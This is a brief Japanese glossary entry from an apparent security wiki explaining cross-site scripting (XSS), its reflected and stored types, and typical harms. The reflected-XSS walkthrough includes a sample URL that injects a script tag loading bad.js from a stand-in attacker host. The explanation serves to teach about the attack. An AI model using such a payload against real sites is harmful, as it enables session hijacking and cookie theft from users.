XSS
提供: セキュリティ
スポンサーリンク
XSS は、 Cross Site Scripting の略です。悪意ある第三者がJavaScriptをページのクエリやCGM(掲示板など)のコメントとして書き込み、ウェブページに悪意あるJavaScriptを埋め込み、セッションを乗っ取ったり、セッション Cookie を盗んだり、ページの改竄、情報の搾取などを行う攻撃のことです。
読み方
- XSS
- えっくすえすえす
- Cross Site Scripting
- クロスサイトスクリプティング
概要
以下のタイプが存在します。
- 折り返し型 XSS ( Reflected XSS )
- フィッシングメール、攻撃用 Web サーバの利用
- 蓄積型 XSS (Stored XSS)
- SNS, 掲示板、ブログ
被害
JavaScript で実現可能なこと範囲で、被害を受ける。
例
- Cookie の漏洩
- 情報漏えい
- Web ページの改ざん
- マルウェアの感染
- 別のサイトへの誘導
Reflected XSS
-
http://example.com/?id=<script src="http://eval.com/bad.js"></script>
へユーザを送り込む。 - ユーザが example.com にアクセスすると、 example.com は、 id の値をそのままエコーバックする。
- example.com のページは、 eval.com/bad.js をロードし、 example.com の権限で実行される。
Stored XSS
- 掲示板に「悪意のあるスクリプト」を書き込む。
- <script>
- 悪意のあるスクリプト
- </script>
- その掲示板に第三者がアクセスする。
- 「悪意のあるスクリプト」を含む HTML ページがロードされる。
- 第三者のブラウザで、「悪意のあるスクリプト」が実行される。
関連情報
ツイート
スポンサーリンク